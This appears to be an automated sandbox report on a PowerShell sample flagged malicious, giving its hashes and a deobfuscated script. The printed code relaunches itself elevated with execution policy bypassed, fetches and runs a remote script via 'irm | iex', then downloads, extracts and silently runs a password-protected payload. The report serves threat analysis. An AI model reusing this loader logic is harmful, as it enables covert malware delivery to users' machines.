Malicious
Malicious

06176c46b973cb88804bc820452c93a4

PowerShell
MD5: 06176c46b973cb88804bc820452c93a4
Size: 1.89 KB
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
06176c46b973cb88804bc820452c93a4
Sha1
166dcd965225e1ea7b3765e7d38985ea80b779a3
Sha256
7cd9942662433becf244379c67a71c53ec3588552e0d0acc7018559a4ddaac44
Sha384
10a8b11f9609ab90fcaf5988eddbe441be2764b634956a80ef94385a3451c85affc268b8c31e9d63c7432a50d245b439
Sha512
0413460dcaac4910c2f51e5f2fd23d9660943f64cd724f8ad3a3bd52e1771890d39e59f92b94ffd209a19f41e81a13233e947686a10ebbaaaa15d882f83723cd
SSDeep
48:we11VHdHLrdwbmMfKYmFROvd9jEgWQfSLq1kMC2DbqrzOIEdJJ:pHdtwK+mFEvduLukMWrLi
TLSH
124175C9C882621A19DD068FDCAF6650525B803DC54B8FA0F8BC5426BBFB75F4256087
File Structure
06176c46b973cb88804bc820452c93a4
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

-verb "RunAs" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command "irm $ScriptUrl | iex"" exit $work = Join-Path $env:TEMP "app_install" $zip = Join-Path $work "Release.zip" $sevenZip = Join-Path $work "7za.exe" $dest = Join-Path $work "extracted" show-installheader write-step 1 "Downloading components" if (Test-Path $work) { Remove-Item $work -Recurse -Force } New-Item -ItemType "Directory" -Path $work -Force | Out-Null Invoke-RestMethod $SevenZipUrl -OutFile $sevenZip Invoke-RestMethod $ZipUrl -OutFile $zip write-step 2 "Preparing files" & $sevenZip "x" $zip "-o$dest" "-p$Password" -y | Out-Null if ($LASTEXITCODE -ne 0) { throw "Extract failed (code $LASTEXITCODE)" } $exe = Join-Path $dest $ExeName if ((Test-Path $exe)) { throw "Installer not found: $exe" } write-step 3 "Running setup" Start-Process $exe -ArgumentList $SilentArgs -Wait

06176c46b973cb88804bc820452c93a4 (1.89 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙